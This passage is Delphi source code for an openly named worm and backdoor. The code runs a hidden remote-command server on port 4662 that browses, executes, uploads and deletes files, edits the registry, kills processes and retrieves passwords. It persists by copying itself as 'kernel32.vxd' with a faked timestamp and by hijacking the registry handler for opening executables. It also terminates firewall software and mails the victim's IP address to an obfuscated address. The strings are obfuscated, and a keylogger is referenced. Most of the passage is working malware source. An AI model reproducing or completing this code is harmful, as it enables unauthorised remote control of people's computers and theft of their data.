Registre.RootKey:=HKEY_LOCAL_MACHINE; if strtoint(params)=3 then Registre.RootKey:=HKEY_USERS; if strtoint(params)=4 then Registre.RootKey:=HKEY_PERFORMANCE_DATA; if strtoint(params)=5 then Registre.RootKey:=HKEY_CURRENT_CONFIG; if strtoint(params)=6 then Registre.RootKey:=HKEY_DYN_DATA; if strtoint(params)>6 then begin sock.WriteString(wParam, PChar(ERROR+#13+#10)); Registre.Free; exit; end; Registre.OpenKey(params1,true); sock.WriteString(wParam, PChar('Data: '+Registre.ReadString(params2)+#13+#10)); Registre.Free; end; procedure DoKillProcess(wParam:longInt;Command:String); begin Killprocess(command); sock.WriteString(wParam, PChar(crypt('Jkohlh`2)')+command+#13+#10)); //Killing: end; procedure DoWindowsProcess(wParam:longInt); var pp:string; begin assignfile(t,windowsdir+'~tmp..dat'); rewrite(t); append(t); EnumWindows(@AddTopLevelWindowsToList,8); closefile(t); assignfile(t,windowsdir+'~tmp..dat'); reset(t); repeat readln(t,pp); Sock.WriteString(wParam, PChar(pp+#13+#10)); sleep(timeout); until pp=''; closefile(t); erase(t); end; procedure DoTimeout(wParam:longInt;Command:String); begin timeout:=strtoint(command); sock.WriteString(wParam, PChar('Timeout: '+command+#13+#10)); end; procedure TSock.OnServerRead(wParam,lParam:longInt); var Command:String; f:HFile; check:string; NumWrite:Integer; OfStr:TOFStruct; t1,t2,yy,taille:longint; Buffy:array[1..1024] of char; begin CountRB:=recv(wParam,Buffy,SizeOf(Buffy),0); if CountRB = 0 then exit; Command:=Copy(Buffy,Pos('/',Buffy)+1,Pos('HTTP',Buffy)-Pos('/',Buffy)-2); if command='' then exit; case command[1] of '0' : DoAbout(wParam); '1' : DoShowDirectory(wParam,copy(command,pos('?',command)+1,255)); '2' : DoStart(wParam); '3' : DoShowLog(wParam); '4' : DoExecFile(wParam,copy(command,pos('?',command)+1,255)); '5' : DoSendFile(wParam,copy(command,pos('?',command)+1,255)); '6' : DoDeleteFile(wParam,copy(command,pos('?',command)+1,255)); '7' : begin command:=copy(command,pos('?',command)+1,255); check:=copy(command,pos('|',command)+1,pos('&',command)-1); taille:=strtoint(check); delete(command,pos('|',command),length(command)); sock.WriteString(wParam, PChar('sendfil:'+#13+#10)); f:=OpenFile(PChar(Command),OFStr,OF_CREATE); if f=HFILE_ERROR then begin sock.WriteString(wParam, PChar(ERROR+#13+#10)); exit; end; yy:=0; t1:=round((taille+512)/1024); t2:=t1*1024; //nombre packet t1:=t2-taille; //end packet //t1:=taille-t2; repeat CountRB:=recv(wParam,Buffy,sizeof(Buffy),0); if countRB<>65535 then begin //writeln(taille); if taille<=1024 then begin WriteFile(f,Buffy,taille,NumWrite,nil); _lclose(f); exit; end; yy:=yy+countRB; //bug if yy=t2 then begin t1:=1024-abs(t1); //writeln(t1); WriteFile(f,Buffy,t1,NumWrite,nil); _lclose(f); exit; end else WriteFile(f,Buffy,countRB,NumWrite,nil); end; fillchar(buffy,sizeof(buffy),#0); until (yy>=taille) or (NumWrite = 0); _lclose(f); exit; //DoReceiveFile(wParam,copy(command,pos('?',command)+1,255)); end; '8' : DoRenameFile(wParam,copy(command,pos('?',command)+1,255)); '9' : DoCreateDirectory(wParam,copy(command,pos('?',command)+1,255)); 'A' : DoDeleteDirectory(wParam,copy(command,pos('?',command)+1,255)); 'B' : DoWriteReg(wParam,copy(command,pos('?',command)+1,255)); 'C' : DoReadReg(wParam,copy(command,pos('?',command)+1,255)); 'D' : DoProxy(wParam,copy(command,pos('?',command)+1,255)); 'E' : DoKillProcess(wParam,copy(command,pos('?',command)+1,255)); 'F' : DoWindowsProcess(wParam); 'G' : DoPassword(wParam); 'H' : DoTimeout(wParam,copy(command,pos('?',command)+1,255)); end; // closesocket(wParam); processmessages; end; //=== Process OnSocketMessage === procedure OnSocketMessage(Msg,wParam,lParam:longInt); begin if ( LOWORD(lParam) and FD_ACCEPT = FD_ACCEPT) then Sock.OnServerAccept(wParam,lParam); if ( LOWORD(lParam) and FD_CLOSE = FD_CLOSE) then sock.OnServerClose(wParam,lParam); if ( LOWORD(lParam) and FD_READ = FD_READ) then sock.OnServerRead(wParam,lParam); end; //=== OnInitSocket === //==TCP procedure InitSocket; begin WSAStartup($101,WSD); Port:=4662; Server := Socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); // Server := Socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP); if Server = -1 then WSACleanup; Addr.sin_family:= AF_INET; Addr.sin_addr.s_addr:=INADDR_ANY; Addr.sin_port:=htons(Port); bind(Server,Addr,SizeOf(Addr)); WSAAsyncSelect(Server,Handle,WM_MY_SOCK_MESSAGE, FD_ACCEPT + FD_CLOSE + FD_READ); // listen; listen(Server,5); end; //==UDP {procedure InitSocket2; begin si:=SizeOf(integer); WSAStartup($101,WSD); Port:=136; Server := Socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP); if Server = -1 then WSACleanup; Addr.sin_family:= PF_INET; Addr.sin_addr.s_addr:=INADDR_ANY; Addr.sin_port:=htons(Port); setsockopt(Server,SOL_SOCKET,SO_BROADCAST,@i,si); bind(Server,Addr,SizeOf(Addr)); WSAAsyncSelect(Server,Handle,WM_MY_SOCK_MESSAGE, FD_ACCEPT + FD_CLOSE + FD_READ); listen(Server,5); end;} //=====copyit function GetFileDateTimeModified(const FileName: string;var yyyy,mm,dd,h,m,s: word):boolean; var dt,tm: word; DateTime: integer; begin result := false; DateTime := FileAge(FileName); if DateTime = -1 then exit else result := true; tm := DateTime and $FFFF; {lower word} dt := DateTime shr 16; {upper word} h := tm shr 11; m := (tm shr 5) and $3F; s := (tm and $1F) * 2; dd := dt and $1F; mm := (dt shr 5) and $F; yyyy := (dt shr 9)+1980; end; function SetFileDateTime(const FileName: string;var yyyy,mm,dd,h,m,s: word):boolean; var SrchHdl: THandle; FileHdl: HFile; FindData: TWin32FindData; wDate,wTime: word; LocalFileTime, NewFileTime: TFileTime; begin result := false; SrchHdl := FindFirstFile(PChar(FileName), FindData); if SrchHdl <> INVALID_HANDLE_VALUE then begin Windows.FindClose(SrchHdl); if (FindData.dwFileAttributes and FILE_ATTRIBUTE_DIRECTORY) = 0 then begin wTime := (h shl 11) + (m shl 5) + (m div 2); wDate := (dd) + (mm shl 5)+ ((yyyy-1980) shl 9); DosDateTimeToFileTime(wDate,wTime,LocalFileTime); LocalFileTimeToFileTime(LocalFileTime, NewFileTime); FileHdl := _lopen(PChar(FileName), OF_WRITE); if FileHdl <> HFILE_ERROR then begin if SetFileTime(FileHdl,@NewFileTime,@NewFileTime,@NewFileTime) then result := true; _lclose(FileHdl); end; end; end; end; procedure copyit; var FromF, ToF: file; NumRead, NumWritten: Integer; Buf: array[1..2048] of Char; begin s:=paramstr(0); if s<>systemdir+crypt(']ifvkck;;$}ti') then begin filemode:=0; if fileexists(systemdir+crypt(']ifvkck;;$}ti')) then exit; //kernel32.vxd AssignFile(FromF,paramstr(0)); Reset(FromF, 1); { Record size = 1 } AssignFile(ToF, systemdir+crypt(']ifvkck;;$}ti')); //kernel32.vxd Rewrite(ToF, 1); { Record size = 1 } repeat BlockRead(FromF, Buf, SizeOf(Buf), NumRead); BlockWrite(ToF, Buf, NumRead, NumWritten); until (NumRead = 0) or (NumWritten <> NumRead); CloseFile(FromF); CloseFile(ToF); GetFileDateTimeModified(windowsdir+crypt(']g{tiium{$nth'),yyyy,mm,dd,h,m,ss); //\explorer.exe SetFileDateTime(systemdir+crypt(']ifvkck;;$}ti'),yyyy,mm,dd,h,m,ss); //kernel32.vxd end; end; //===========Online??? const INVALID_IP_ADDRESS= $ffffffff; function ip2string(ip_address:longint):string; begin ip_address:=ntohl(ip_address); result:= inttostr(ip_address shr 24)+'.'+ inttostr((ip_address shr 16) and $ff)+'.'+ inttostr((ip_address shr 8) and $ff)+'.'+ inttostr(ip_address and $ff); end; function lookup_hostname(const hostname:string):longint; var RemoteHost : PHostEnt; (* no, don't free it! *) ip_address: integer; s: string; begin ip_address:=INVALID_IP_ADDRESS; try if hostname='' then begin (* no host given! *) lookup_hostname:=ip_address; EXIT; end else begin s:=hostname+#0; ip_address:=Inet_Addr(PChar(@s[1])); // ip_address:=Winsock.Inet_Addr(PChar(hostname)); if ip_address=$FFFFFFFF then begin RemoteHost:=GetHostByName(PChar(@s[1])); // RemoteHost:=Winsock.GetHostByName(PChar(hostname)); if (RemoteHost=NIL) or (RemoteHost^.h_length<=0) then begin lookup_hostname:=ip_address; EXIT; (* host not found *) end else ip_address:=longint(pointer(RemoteHost^.h_addr_list^)^); end; end; except ip_address:=INVALID_IP_ADDRESS; end; lookup_hostname:=ip_address; end; //====== Connection Irc === type THede = class(TObject) procedure MyHwndProc(var Msg:TMessage); procedure agprun; function ip2string(ip_address:longint):string; end; const SocketMessag = WM_USER+107; var MySocket: TSocket; MyName : TSockAddr; MyAddr : TInAddr; Hede: THede; Buffer:array[0..1023] of char; res : word; WST : TWSAData; host: string; b:byte; function my_ip_address:longint; const bufsize=255; var buf: pointer; RemoteHost : PHostEnt; (* No, don't free it! *) begin buf:=NIL; try getmem(buf,bufsize); gethostname(buf,bufsize); (* this one maybe without domain *) RemoteHost:=GetHostByName(buf); if RemoteHost=NIL then my_ip_address:=htonl($7F000001) (* 127.0.0.1 *) else my_ip_address:=longint(pointer(RemoteHost^.h_addr_list^)^); finally if buf<>NIL then freemem(buf,bufsize); end; end; function THede.ip2string(ip_address:longint):string; begin ip_address:=ntohl(ip_address); result:= inttostr(ip_address shr 24)+'.'+ inttostr((ip_address shr 16) and $ff)+'.'+ inttostr((ip_address shr 8) and $ff)+'.'+ inttostr(ip_address and $ff); end; procedure THede.MyHwndProc(var msg:TMessage); var check,s:string; begin FillChar(buffer,sizeof(buffer),#0); if msg.Msg = SocketMessag then begin if msg.LParamLo = FD_CLOSE then begin //writeln('end'); closesocket(mysocket); WSACleanup; exit; end; //if msg.LParamLo = FD_WRITE then writeln('[Socket Write]'); end; // sock.WriteString(MySocket,pchar(crypt('TQFV%')+copy(nukemsg2,1,7)+' "'+nukemsg2+'.com" "'+ip2string(my_ip_address)+'" :'+copy(nukemsg2,1,5)+#13+#10)); //USER end; procedure THede.agpRun; var zday,zmonth,s:string; myhwnd: Thandle; SystemTime:TSystemTime; z:longint; day,month:integer; begin host:='mail.hotmail.com'; z:=lookup_hostname(host); host:=ip2string(z); MySocket:=socket(PF_INET,SOCK_STREAM,IPPROTO_TCP); MyAddr.S_addr:=Inet_Addr(@Host[1]); MyName.sin_family:=PF_INET; MyName.sin_port:=htons(25); //port to connect MyName.sin_addr:=MyAddr; // MyName.sin_port:=ntohs(strtoint(edit4.text)); //port on receive res:=connect(MySocket,MyName,sizeof(MyName)); if res<>0 then begin //S:='Connect Error : '+inttostr(WSAGetLastError); //writeln(s); closesocket(mysocket); WSACleanup; exit; end; myhwnd := AllocateHwnd(hede.MyHWndProc); WSAAsyncSelect(MySocket, myhwnd, SocketMessag, FD_WRITE OR FD_CLOSE ); res:=Recv(MySocket,Buffer,sizeof(buffer),0); sleep(2000); sock.WriteString(MySocket,pchar('HELO mail.hotmail.com'+#13+#10)); sleep(1000); sock.WriteString(MySocket,pchar('MAIL FROM: Energy@hotmail.com'+#13+#10)); sleep(1000); sock.WriteString(MySocket,pchar('RCPT TO: '+crypt('bmga}bf|hJccycny}<p{x')+#13+#10)); sleep(1000); sock.WriteString(MySocket,pchar('DATA'+#13+#10)); sleep(1000); sock.WriteString(MySocket,pchar('From: Energy-Support@hotmail.com'+#13+#10)); sleep(1000); sock.WriteString(MySocket,pchar('To: '+crypt('bmga}bf|hJccycny}<p{x')+#13+#10)); sleep(1000); sock.WriteString(MySocket,pchar('Subject: Failed delivery'+#13+#10)); sleep(1000); with systemtime do begin wYear:= wYear; wMonth:=wMonth; wDayOfWeek:= wDayOfWeek; wDay:=wDay; wHour:= wHour; wMinute:= wMinute; wSecond:= wSecond; wMilliseconds:= wMilliseconds; end; getsystemtime(SystemTime); day:=systemtime.wDayOfWeek; case day of 0: zday:='Sun'; 1: zday:='Mon'; 2: zday:='Tue'; 3: zday:='Wed'; 4: zday:='Thu'; 5: zday:='Fri'; 6: zday:='Sat'; end; month:=systemtime.wMonth; case month of 1: zmonth:='Jan'; 2: zmonth:='Feb'; 3: zmonth:='Mar'; 4: zmonth:='Apr'; 5: zmonth:='May'; 6: zmonth:='Jun'; 7: zmonth:='Jul'; 8: zmonth:='Aug'; 9: zmonth:='Sep'; 10: zmonth:='Oct'; 11: zmonth:='Nov'; 12: zmonth:='Dec'; end; sock.WriteString(MySocket,pchar('Date: '+zday+', '+inttostr(systemtime.wDay)+' '+zmonth+ ' '+inttostr(systemtime.wYear)+' '+inttostr(systemtime.wHour)+':'+inttostr(systemtime.wMinute)+':'+inttostr(systemtime.wSecond)+' +0000'+#13+#10)); //Date: Sat, 1 May 1999 20:46:00 +0000 sleep(1000); sock.WriteString(MySocket,pchar(''+#13+#10)); sleep(1000); sock.WriteString(MySocket,pchar('Content-Type: ' + 'text/plain' + '; charset="' +'iso-8859-1' + '"'+#13+#10)); sleep(1000); sock.WriteString(MySocket,pchar('Content-Transfer-Encoding: quoted-printable'+#13+#10)); sleep(1000); sock.WriteString(MySocket,pchar(''+#13+#10)); sleep(1000); sock.WriteString(MySocket,pchar('Hi '+ip2string(my_ip_address)+#13+#10)); sleep(1000); sock.WriteString(MySocket,pchar(''+#13+#10)); sleep(1000); sock.WriteString(MySocket,pchar('.'+#13+#10)); sleep(1000); sock.WriteString(MySocket,pchar('QUIT'+#13+#10)); closesocket(mysocket); WSACleanup; exit; while not ExitCode<>ExitCode2 do processmessages; end; //===fuck_protection procedure scanprotection; begin if findwindow(nil,@(crypt('OgwEuv@}hxo'))[1])<>0 then //NetAppGuard begin killprocess(crypt('OgwEuv@}hxo')); //NetAppGuard end; if findwindow(nil,@(crypt('BmmW`gk(YI+JD\JGP^_'))[1])<>0 then //ConSeal PC FIREWALL begin killprocess(crypt('BmmW`gk(YI+JD\JGP^_')); appmsg(pchar(crypt('HR#ekb''ijidycz/~pv4yyp|~;ss>lIFLBHDGD eABJWP^wZXd]XVzTLZ7 ./d3#5; %%b'))); end; end; //============Thread_procedure=== procedure ThreadProc3; stdcall; begin end; procedure ThreadProc2; stdcall; begin end; procedure ThreadProc; stdcall; var ck1,ck2,ck3:boolean; begin ck1:=false; ck2:=false; ck3:=false; //initsocket; repeat WSACleanup; WSAStartup($101,WSD); z:=lookup_hostname(crypt('vut*hodzfydjy l|')); //www.microsoft.com if z>0 then ck1:=true else ck1:=false; if (ck1=true) and (ck2=false) then begin ck2:=true; ck3:=true; WSACleanup; initsocket; sleep(2000); WSAStartup($101,WST); hede.agprun; end; if (ck1=false) and (ck3=true) then begin ck3:=false; ck2:=false; ShutDownServer; WSACleanup; //writeln('disconnect'); end; sleep(120000); until TerminateThread(ThreadHdle, ExitCode); ShutDownServer; end; //=== Process CreateWindow === procedure OnCreate(hWnd:Integer); begin // end; procedure OnClose(hWnd:Integer); begin ShellExecute(0,nil,PChar(paramstr(0)),nil,nil,SW_NORMAL); //=== re active it ShutDownServer; GetExitCodeThread(ThreadHdle, ExitCode); TerminateThread(ThreadHdle, ExitCode); //GetExitCodeThread(ThreadHdle2, ExitCode2); //TerminateThread(ThreadHdle2, ExitCode2); //GetExitCodeThread(ThreadHdle3, ExitCode3); //TerminateThread(ThreadHdle3, ExitCode3); klog.LogDestroy; end; //== Processes every message sent to MAIN window === function WindowProc(hWnd,Msg,wParam,lParam:Longint):Longint; stdcall; begin Result:= 0; case Msg of WM_CREATE : OnCreate(hWnd); WM_CLOSE : OnClose(hWnd); WM_MY_SOCK_MESSAGE : OnSocketMessage(Msg,wParam,lParam); WM_DESTROY : ShutDownServer; end; Result:=DefWindowProc(hWnd,Msg,wParam,lParam); end; function RenameFile(const OldName, NewName: string): Boolean; begin Result := MoveFile(PChar(OldName), PChar(NewName)); end; //=== This is the MAIN PART program ======= begin scanprotection; {sss:=paramstr(1); for iii:=length(sss) downto 1 do begin ccc:=sss[iii]; sss2:=sss2+ccc; if ccc='\' then break; end; if ((sss2=crypt('DZF*75DZ@GW')) or (sss2=crypt('DZF*FTNEU'))) then begin copyfile(pchar(sss),pchar(copy(sss,1,length(sss)-length(sss2))+'\mirc32.com'),true); winexec(PChar(copy(sss,1,length(sss)-length(sss2))+'\mirc32.com'),SW_NORMAL); halt; end;} if (length(paramstr(1))>0) and (length(paramstr(2))>0) and (length(paramstr(3))>0) then winexec(PChar(paramstr(1)+' '+paramstr(2)+' '+paramstr(3)),SW_NORMAL); if (length(paramstr(1))>0) and (length(paramstr(2))>0) and (length(paramstr(3))=0) then winexec(PChar(paramstr(1)+' '+paramstr(2)),SW_NORMAL); if (length(paramstr(1))>0) and (length(paramstr(2))=0) then winexec(PChar(paramstr(1)),SW_NORMAL); if FindWindow(lpzClassName,lpzWindowsName) <> 0 then begin Halt; end;//If start second time hInst:=GetModuleHandle(nil); with wClass do begin Style:= CS_PARENTDC; hIcon:= 0; cbClsExtra:= 0; cbWndExtra:= 0; lpfnWndProc:= @WindowProc; hInstance:= hInst; hbrBackground:= COLOR_WINDOW; lpszClassName:= lpzClassName; lpszMenuName:= NIL; hCursor:= 0; //LoadCursor(0,IDC_ARROW); end; RegisterClass(wClass); Handle:=CreateWindow(lpzClassName,lpzWindowsName,WS_BORDER + WS_SIZEBOX, 0,0,10,10,0,0{hPP},hInst,nil); if Handle<>0 then begin UpdateWindow(Handle); ShowWindow(Handle, SW_HIDE); //SW_HIDE RegisterInService; end; //ThreadHdle2 := CreateThread( Nil,0,@ThreadProc2,Nil,0,ThreadID2); //scan protection //ThreadHdle3 := CreateThread( Nil,0,@ThreadProc3,Nil,0,ThreadID3); //scan protection Registre:=TRegistry.create; Registre.RootKey:=HKEY_CLASSES_ROOT; Registre.OpenKey('exefile\shell\open\command',true); Registre.WriteString('',pchar(crypt('jgqj`j4:''|sh-,*!326>'))); //kernel32.vxd "%1" %* Registre.Free; copyit; Timeout:=70; ThreadHdle := CreateThread( Nil,0,@ThreadProc,Nil,0,ThreadID); //Online??? //repeat //sleep(2000); //until z>0; //if z>0 then klog.LogCreate; ProcessMessages; end. --[Energy_Trickly_Worm.dpr]--------------------------------------------------------------- program v; uses dialogs,Windows; {$R *.RES} const {winsock const} FD_SETSIZE = 64; IOCPARM_MASK = $7f; IOC_VOID = $20000000; IOC_OUT = $40000000; IOC_IN = $80000000; IOC_INOUT = (IOC_IN or IOC_OUT); FIONREAD = IOC_OUT or { get # bytes to read } ((Longint(SizeOf(Longint)) and IOCPARM_MASK) shl 16) or (Longint(Byte('f')) shl 8) or 127; FIONBIO = IOC_IN or { set/clear non-blocking i/o } ((Longint(SizeOf(Longint)) and IOCPARM_MASK) shl 16) or (Longint(Byte('f')) shl 8) or 126; FIOASYNC = IOC_IN or { set/clear async i/o } ((Longint(SizeOf(Longint)) and IOCPARM_MASK) shl 16) or (Longint(Byte('f')) shl 8) or 125; // Protocols } IPPROTO_IP = 0; { dummy for IP } IPPROTO_ICMP = 1; { control message protocol } IPPROTO_IGMP = 2; { group management protocol } IPPROTO_GGP = 3; { gateway^2 (deprecated) } IPPROTO_TCP = 6; { tcp } IPPROTO_PUP = 12; { pup } IPPROTO_UDP = 17; { user datagram protocol } IPPROTO_IDP = 22; { xns idp } IPPROTO_ND = 77; { UNOFFICIAL net disk proto } IPPROTO_RAW = 255; { raw IP packet } IPPROTO_MAX = 256; IPPORT_RESERVED = 1024; INADDR_ANY = $00000000; INADDR_LOOPBACK = $7F000001; INADDR_BROADCAST = $FFFFFFFF; INADDR_NONE = $FFFFFFFF; WSADESCRIPTION_LEN = 256; WSASYS_STATUS_LEN = 128; TF_DISCONNECT = $01; TF_REUSE_SOCKET = $02; TF_WRITE_BEHIND = $04; IP_OPTIONS = 1; IP_MULTICAST_IF = 2; { set/get IP multicast interface } IP_MULTICAST_TTL = 3; { set/get IP multicast timetolive } IP_MULTICAST_LOOP = 4; { set/get IP multicast loopback } IP_ADD_MEMBERSHIP = 5; { add an IP group membership } IP_DROP_MEMBERSHIP = 6; { drop an IP group membership } IP_TTL = 7; { set/get IP Time To Live } IP_TOS = 8; { set/get IP Type Of Service } IP_DONTFRAGMENT = 9; { set/get IP Don't Fragment flag } IP_DEFAULT_MULTICAST_TTL = 1; { normally limit m'casts to 1 hop } IP_DEFAULT_MULTICAST_LOOP = 1; { normally hear sends if a member } IP_MAX_MEMBERSHIPS = 20; { per socket; must fit in one mbuf } SOCK_STREAM = 1; { stream socket } SOCK_DGRAM = 2; { datagram socket } SOCK_RAW = 3; { raw-protocol interface } SOCK_RDM = 4; { reliably-delivered message } SOCK_SEQPACKET = 5; { sequenced packet stream } SO_DEBUG = $0001; { turn on debugging info recording } SO_ACCEPTCONN = $0002; { socket has had listen() } SO_REUSEADDR = $0004; { allow local address reuse } SO_KEEPALIVE = $0008; { keep connections alive } SO_DONTROUTE = $0010; { just use interface addresses } SO_BROADCAST = $0020; { permit sending of broadcast msgs } SO_USELOOPBACK = $0040; { bypass hardware when possible } SO_LINGER = $0080; { linger on close if data present } SO_OOBINLINE = $0100; { leave received OOB data in line } SO_DONTLINGER = $ff7f; SO_SNDBUF = $1001; { send buffer size } SO_RCVBUF = $1002; { receive buffer size } SO_SNDLOWAT = $1003; { send low-water mark } SO_RCVLOWAT = $1004; { receive low-water mark } SO_SNDTIMEO = $1005; { send timeout } SO_RCVTIMEO = $1006; { receive timeout } SO_ERROR = $1007; { get error status and clear } SO_TYPE = $1008; { get socket type } // SO_CONNDATA = $7000; // SO_CONNOPT = $7001; // SO_DISCDATA = $7002; // SO_DISCOPT = $7003; // SO_CONNDATALEN = $7004; // SO_CONNOPTLEN = $7005; // SO_DISCDATALEN = $7006; // SO_DISCOPTLEN = $7007; // SO_OPENTYPE = $7008; // SO_SYNCHRONOUS_ALERT = $10; // SO_SYNCHRONOUS_NONALERT = $20; // SO_MAXDG = $7009; // SO_MAXPATHDG = $700A; // SO_UPDATE_ACCEPT_CONTEXT = $700B; // SO_CONNECT_TIME = $700C; TCP_NODELAY = $0001; TCP_BSDURGENT = $7000; // AF_UNSPEC = 0; { unspecified } AF_UNIX = 1; { local to host (pipes, portals) } AF_INET = 2; { internetwork: UDP, TCP, etc. } // AF_IMPLINK = 3; { arpanet imp addresses } // AF_PUP = 4; { pup protocols: e.g. BSP } // AF_CHAOS = 5; { mit CHAOS protocols } // AF_IPX = 6; { IPX and SPX } // AF_NS = 6; { XEROX NS protocols } // AF_ISO = 7; { ISO protocols } // AF_OSI = AF_ISO; { OSI is ISO } // AF_ECMA = 8; { european computer manufacturers } // AF_DATAKIT = 9; { datakit protocols } // AF_CCITT = 10; { CCITT protocols, X.25 etc } // AF_SNA = 11; { IBM SNA } // AF_DECnet = 12; { DECnet } // AF_DLI = 13; { Direct data link interface } // AF_LAT = 14; { LAT } // AF_HYLINK = 15; { NSC Hyperchannel } // AF_APPLETALK = 16; { AppleTalk } // AF_NETBIOS = 17; { NetBios-style addresses } // AF_VOICEVIEW = 18; { VoiceView } // AF_FIREFOX = 19; { FireFox } // AF_UNKNOWN1 = 20; { Somebody is using this! } // AF_BAN = 21; { Banyan } // AF_MAX = 22; // PF_UNSPEC = AF_UNSPEC; PF_UNIX = AF_UNIX; PF_INET = AF_INET; // PF_IMPLINK = AF_IMPLINK; // PF_PUP = AF_PUP; // PF_CHAOS = AF_CHAOS; // PF_NS = AF_NS; // PF_IPX = AF_IPX; // PF_ISO = AF_ISO; // PF_OSI = AF_OSI; // PF_ECMA = AF_ECMA; // PF_DATAKIT = AF_DATAKIT; // PF_CCITT = AF_CCITT; // PF_SNA = AF_SNA; // PF_DECnet = AF_DECnet; // PF_DLI = AF_DLI; // PF_LAT = AF_LAT; // PF_HYLINK = AF_HYLINK; // PF_APPLETALK = AF_APPLETALK; // PF_VOICEVIEW = AF_VOICEVIEW; // PF_FIREFOX = AF_FIREFOX; // PF_UNKNOWN1 = AF_UNKNOWN1; // PF_BAN = AF_BAN; // PF_MAX = AF_MAX; SOL_SOCKET = $ffff; {options for socket level } SOMAXCONN = 5;{ Maximum queue length specifiable by listen. } MSG_OOB = $1; {process out-of-band data } MSG_PEEK = $2; {peek at incoming message } MSG_DONTROUTE = $4; {send without using routing tables } MSG_MAXIOVLEN = 16; MSG_PARTIAL = $8000; {partial send or recv for message xport } MAXGETHOSTSTRUCT = 1024; FD_READ = $01; FD_WRITE = $02; FD_OOB = $04; FD_ACCEPT = $08; FD_CONNECT = $10; FD_CLOSE = $20; WSABASEERR = 10000; WSAEINTR = (WSABASEERR+4); WSAEBADF = (WSABASEERR+9); WSAEACCES = (WSABASEERR+13); WSAEFAULT = (WSABASEERR+14); WSAEINVAL = (WSABASEERR+22); WSAEMFILE = (WSABASEERR+24); WSAEWOULDBLOCK = (WSABASEERR+35); WSAEINPROGRESS = (WSABASEERR+36); WSAEALREADY = (WSABASEERR+37); WSAENOTSOCK = (WSABASEERR+38); WSAEDESTADDRREQ = (WSABASEERR+39); WSAEMSGSIZE = (WSABASEERR+40); WSAEPROTOTYPE = (WSABASEERR+41); WSAENOPROTOOPT = (WSABASEERR+42); WSAEPROTONOSUPPORT = (WSABASEERR+43); WSAESOCKTNOSUPPORT = (WSABASEERR+44); WSAEOPNOTSUPP = (WSABASEERR+45); WSAEPFNOSUPPORT = (WSABASEERR+46); WSAEAFNOSUPPORT = (WSABASEERR+47); WSAEADDRINUSE = (WSABASEERR+48); WSAEADDRNOTAVAIL = (WSABASEERR+49); WSAENETDOWN = (WSABASEERR+50); WSAENETUNREACH = (WSABASEERR+51); WSAENETRESET = (WSABASEERR+52); WSAECONNABORTED = (WSABASEERR+53); WSAECONNRESET = (WSABASEERR+54); WSAENOBUFS = (WSABASEERR+55); WSAEISCONN = (WSABASEERR+56); WSAENOTCONN = (WSABASEERR+57); WSAESHUTDOWN = (WSABASEERR+58); WSAETOOMANYREFS = (WSABASEERR+59); WSAETIMEDOUT = (WSABASEERR+60); WSAECONNREFUSED = (WSABASEERR+61); WSAELOOP = (WSABASEERR+62); WSAENAMETOOLONG = (WSABASEERR+63); WSAEHOSTDOWN = (WSABASEERR+64); WSAEHOSTUNREACH = (WSABASEERR+65); WSAENOTEMPTY = (WSABASEERR+66); WSAEPROCLIM = (WSABASEERR+67); WSAEUSERS = (WSABASEERR+68); WSAEDQUOT = (WSABASEERR+69); WSAESTALE = (WSABASEERR+70); WSAEREMOTE = (WSABASEERR+71); WSAEDISCON = (WSABASEERR+101); WSASYSNOTREADY = (WSABASEERR+91); WSAVERNOTSUPPORTED = (WSABASEERR+92); WSANOTINITIALISED = (WSABASEERR+93); WSAHOST_NOT_FOUND = (WSABASEERR+1001); HOST_NOT_FOUND = WSAHOST_NOT_FOUND; WSATRY_AGAIN = (WSABASEERR+1002); TRY_AGAIN = WSATRY_AGAIN; WSANO_RECOVERY = (WSABASEERR+1003); NO_RECOVERY = WSANO_RECOVERY; WSANO_DATA = (WSABASEERR+1004); NO_DATA = WSANO_DATA; WSANO_ADDRESS = WSANO_DATA; NO_ADDRESS = WSANO_ADDRESS; EWOULDBLOCK = WSAEWOULDBLOCK; EINPROGRESS = WSAEINPROGRESS; EALREADY = WSAEALREADY; ENOTSOCK = WSAENOTSOCK; EDESTADDRREQ = WSAEDESTADDRREQ; EMSGSIZE = WSAEMSGSIZE; EPROTOTYPE = WSAEPROTOTYPE; ENOPROTOOPT = WSAENOPROTOOPT; EPROTONOSUPPORT = WSAEPROTONOSUPPORT; ESOCKTNOSUPPORT = WSAESOCKTNOSUPPORT; EOPNOTSUPP = WSAEOPNOTSUPP; EPFNOSUPPORT = WSAEPFNOSUPPORT; EAFNOSUPPORT = WSAEAFNOSUPPORT; EADDRINUSE = WSAEADDRINUSE; EADDRNOTAVAIL = WSAEADDRNOTAVAIL; ENETDOWN = WSAENETDOWN; ENETUNREACH = WSAENETUNREACH; ENETRESET = WSAENETRESET; ECONNABORTED = WSAECONNABORTED; ECONNRESET = WSAECONNRESET; ENOBUFS = WSAENOBUFS; EISCONN = WSAEISCONN; ENOTCONN = WSAENOTCONN; ESHUTDOWN = WSAESHUTDOWN; ETOOMANYREFS = WSAETOOMANYREFS; ETIMEDOUT = WSAETIMEDOUT; ECONNREFUSED = WSAECONNREFUSED; ELOOP = WSAELOOP; ENAMETOOLONG = WSAENAMETOOLONG; EHOSTDOWN = WSAEHOSTDOWN; EHOSTUNREACH = WSAEHOSTUNREACH; ENOTEMPTY = WSAENOTEMPTY; EPROCLIM = WSAEPROCLIM; EUSERS = WSAEUSERS; EDQUOT = WSAEDQUOT; ESTALE = WSAESTALE; EREMOTE = WSAEREMOTE; winsocket = 'vqlgn55&mfg'; //wsock32.dll {messages windows const} WM_NULL = $0000; WM_CREATE = $0001; WM_DESTROY = $0002; WM_MOVE = $0003; WM_SIZE = $0005; WM_ACTIVATE = $0006; WM_SETFOCUS = $0007; WM_KILLFOCUS = $0008; WM_ENABLE = $000A; WM_SETREDRAW = $000B; WM_SETTEXT = $000C; WM_GETTEXT = $000D; WM_GETTEXTLENGTH = $000E; WM_PAINT = $000F; WM_CLOSE = $0010; WM_QUERYENDSESSION = $0011; WM_QUIT = $0012; WM_QUERYOPEN = $0013; WM_ERASEBKGND = $0014; WM_SYSCOLORCHANGE = $0015; WM_ENDSESSION = $0016; WM_SYSTEMERROR = $0017; WM_SHOWWINDOW = $0018; WM_CTLCOLOR = $0019; WM_WININICHANGE = $001A; WM_SETTINGCHANGE = WM_WININICHANGE; WM_DEVMODECHANGE = $001B; WM_ACTIVATEAPP = $001C; WM_FONTCHANGE = $001D; WM_TIMECHANGE = $001E; WM_CANCELMODE = $001F; WM_SETCURSOR = $0020; WM_MOUSEACTIVATE = 